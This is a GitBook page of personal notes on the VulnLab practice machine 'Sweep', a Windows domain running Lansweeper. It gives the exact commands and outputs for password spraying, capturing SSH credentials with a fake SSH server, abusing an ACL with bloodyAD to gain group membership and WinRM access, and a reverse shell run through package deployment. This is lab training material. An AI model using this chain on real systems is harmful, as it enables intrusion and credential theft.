Intrusionz3r0
HacktheboxTwitter
  • Welcome
  • Windows Penetration Testing
    • Enumeration
    • Credentials Attacks On Windows
    • Kerberos
    • Abuse ACLS
    • Common Attacks
    • Abuse Tokens
    • Kerberos “Double Hop”
    • Privileged Groups
    • Defense Evasion
    • Active Directory Certificate Services
    • Windows Persistence
    • Privilege Escalation
    • Trust Enumeration and Attacks
    • Windows Lateral Movement
    • Powershell Cheetsheet
    • Microsoft Exchange and Office
  • Linux Penetration Testing
    • Linux Active directory
    • Tools
    • Privilege Groups
    • Post Exploitation
    • Privilege Escalation
      • Sudo Privilege escalation
      • Writable .service files
      • Wildcard on compression binaries
      • Path Abuse
      • Capabilities
      • Exploit Logrotate
      • Weak NFS Privileges
      • Hijacking Tmux Sessions
      • Shared Libraries
      • Shared Object Hijacking
      • Python Library Hijacking
      • Linux Enumeration
    • Stealing Linux Credentials
    • Critical Vulnerabilities
    • Upgrading TTY
    • Process monitoring
    • Miscellaneous
    • Escape Restricted Shell
  • Malware Development
    • Malware Development Essentials
    • Code Snippets
    • Malware Development Intermediate
  • Social Engineering
  • Portforwarding and tunneling
  • File Transfer Techniques
  • Password Attacks
  • Enumeration
    • Network Enumeration
    • (OSINT) Active Enumeration
    • (OSINT) Passive Enumeration
    • [22] SSH
    • [21] FTP
    • [25,465,587] SMTP
    • [53] DNS Enumeration
    • [80 443] HTTP HTTPS
    • [110,143,993,995] IMAP/POP3 Enumeration
    • [111,2049] Network File System
    • [139,445] SMB Enumeration
    • [161] SNMP
    • [512,513,514] R-Services
    • [623] IPMI
    • [873] Rsync
    • [1433] MSSQL
    • [1521] Oracle TNS
    • [3389] Remote Desktop Protocol (RDP)
    • [5985/5986] WinRM
    • [3306] Mysql
    • [513] Rlogin
  • Hacking Web
    • Methodology
    • Vulnerabilities
      • SQL Injection
      • Cross Site Scripting (XSS)
      • File path traversal/Local File Inclusion
      • File Upload Attacks
      • Denial of Service
      • Command Injection
      • Insecure Direct Object Reference (IDOR)
      • XML External Entity (XXE) Injection
      • Web Mass Assignment Vulnerabilities
      • Log4Shell Exploitation Guide
      • Authentication
      • Business Vulnerabilities
      • Access control vulnerabilities
      • Server-Side Request Forgery (SSRF)
      • Cross-site request forgery (CSRF)
      • Cross-origin resource sharing (CORS)
      • Clickjacking
      • DOM-based vulnerabilities
      • JWT vulnerabilities
      • Password reset poisoning
    • Web Tech Detection viaa Tokens, Headers & Cookies
    • Burpsuite through SOCKS5
    • Bypass 403 - Forbidden
  • OSINT
  • Common Applications
    • Gitlab
    • Splunk
    • Tomcat
    • Joomla
    • Microsoft Internet Information Services (IIS)
    • Nagios XI
    • Wordpress
    • Drupal
    • Tomcat CGI
    • osTicket
    • Attacking Thick Client Applications
    • PRTG Network Monitor
    • Jenkins
    • ColdFusion
    • WebLogic
    • Grafana
    • Umbraco
  • Containers Pentesting
  • C2 Command and Control
    • Sliver
    • Cobalt Strike
    • Mythic
    • Havoc
  • Report Templates
  • Anonymity Guide
  • Labs
    • Vulnlabs
      • Baby
      • Trusted (Chain)
      • Retro
      • Retro2
      • Hybrid (Chain)
      • Baby2
      • Breach
      • Sendai
      • Sweep
      • Delegate
      • Redelegate
      • Media
      • Bruno
      • Cicada
      • Lustrous2
      • Tengu (Chain)
      • Reflection (Chain)
      • Tea (Chain)
      • Heron (Chain)
      • Lustrous (Chain)
      • Kaiju (Chain)
      • Intercept (Chain)
      • Sidecar (Chain)
      • Vigilant (Chain)
      • Job
      • Job2
      • Puppet (Chain)
      • Mythical (Chain)
      • Push (Chain)
Powered by GitBook
On this page
  • Credentials
  • Information Gathering
  • Service enumeration
  • Exploitation
  • Capturing SSH credentials
  • Abusing the DACL to obtain Remote Access
  • Domain Compromise
  1. Labs
  2. Vulnlabs

Sweep

This is not a writeup, just my notes about VulnLabs machines.

PreviousSendaiNextDelegate

Last updated 1 month ago

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username
Password
Method
Scope

intern

intern

Password Spraying

Domain Account + Lansweeper

svc_inventory_lnx

0|5m-U6?/uAX

SSH Sniffing

Domain Account + Lansweeper

✅ Valid Usernames

Guest
Administrator
INVENTORY$
fcla801
bcla614
jgar931
jgre808
hmar648
jwil197
grob171
jsmi791
fdav736
svc_inventory_lnx
intern
hjoh690
svc_inventory_win

🔑 Passwords list

intern
0|5m-U6?/uAX

Information Gathering

Nmap scan

# Nmap 7.94SVN scan initiated Mon Apr  7 18:26:14 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_sweep_tcp_allports -vvv 10.10.122.166
53/tcp    open  domain            syn-ack ttl 127 Simple DNS Plus
81/tcp    open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp    open  ssl/http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp    open  kerberos-sec      syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-07 22:30:43Z)
135/tcp   open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?     syn-ack ttl 127
464/tcp   open  kpasswd5?         syn-ack ttl 127
593/tcp   open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?          syn-ack ttl 127
3268/tcp  open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 127
3389/tcp  open  ms-wbt-server     syn-ack ttl 127 Microsoft Terminal Services
5357/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            syn-ack ttl 127 .NET Message Framing
9524/tcp  open  ssl/unknown       syn-ack ttl 127
49664/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service enumeration

DNS

  • Not vulnerable to DNS Zone Transfer AXFR

SMB (enum4linux-ng)

Domain SID: S-1-5-21-4292653625-3348997472-4156797480

  • Server allows null session authentication

  • Server allows guest session authentication

    • RID-Bruteforce returned a list of valid usernames.

LDAP

  • Not kerberoastable users.

  • Not Asreproastable users.

Username as password bruteforce

❯ nxc smb 10.10.122.166 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.10.122.166   445    INVENTORY        [+] sweep.vl\intern:intern

Bloodhound enumeration

❯ bloodhound-python -c all --zip -u intern -p intern -d sweep.vl -ns 10.10.122.166
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 31S
INFO: Compressing output into 20250407184605_bloodhound.zip

Possible users with privilege escalation

  • svc_inventory_lnx

  • JGRE808

  • svc_inventory_win

HTTP

LANSWEEPER v. 11.1.6.0

Lansweeper is an IT Asset Management (ITAM) platform that helps organizations discover, manage, and optimize their technology assets, providing visibility into IT, OT, and IoT assets, and enabling centralized IT inventory and management.

Valid Creeds: intern:intern

Exploitation

Capturing SSH credentials

Discovering SSH credentials stored in lansweeper

Lansweeper can scan more asset details with scanning credentials.

Mapping the SSH credentials to the Scan

The tester configured a Scanning Target and append the Linux credentials.

Setting up a Fake SSH service.

The tester run a fake ssh service to capture the svc_inventory_win plaintext credentials.

❯ go install github.com/fffaraz/fakessh@latest
❯ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
❯ ~/go/bin/fakessh
2025/04/07 19:35:16.726181 10.10.122.166:51407 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx 0|5m-U6?/uAX

Abusing the DACL to obtain Remote Access

❯ bloodyAD -u 'svc_inventory_lnx' -p '0|5m-U6?/uAX' --dc-ip 10.10.122.166 add groupMember 'Lansweeper Admins' 'svc_inventory_lnx'
[+] svc_inventory_lnx added to Lansweeper Admins
❯ nxc winrm 10.10.122.166 -u 'svc_inventory_lnx' -p '0|5m-U6?/uAX'
WINRM       10.10.122.166   5985   INVENTORY        [*] Windows Server 2022 Build 20348 (name:INVENTORY) (domain:sweep.vl)
WINRM       10.10.122.166   5985   INVENTORY        [+] sweep.vl\svc_inventory_lnx:0|5m-U6?/uAX (Pwn3d!)

Domain Compromise

Adding a new Map Credentials

The tester utilized the new credentials to log into the application and configured a new set of credentials.

Creating a new package deployment to obtain reverse shell.

The tester accessed the Package deployment section and initiated the creation of a new package. Utilizing , the tester generated a reverse shell, which was then triggered and sent to compromise the server as NT Authority System.

revshells.com